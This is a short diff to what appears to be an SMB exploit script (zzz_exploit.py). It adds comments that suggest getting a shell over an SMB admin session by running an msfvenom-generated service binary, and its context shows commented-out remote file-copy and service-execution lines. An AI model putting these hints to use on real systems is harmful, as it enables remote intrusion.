diff --git a/zzz_exploit.py b/zzz_exploit.py
index 6b40510..695df6a 100644
--- a/zzz_exploit.py
+++ b/zzz_exploit.py
@@ -898,6 +898,9 @@ def smb_pwn(conn, arch):
 	
 	#smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
 	#service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
+	# Note: there are many methods to get shell over SMB admin session
+	# a simple method to get shell (but easily to be detected by AV) is
+	# executing binary generated by "msfvenom -f exe-service ..."
 
 def smb_send_file(smbConn, localSrc, remoteDrive, remotePath):
 	with open(localSrc, 'rb') as fp: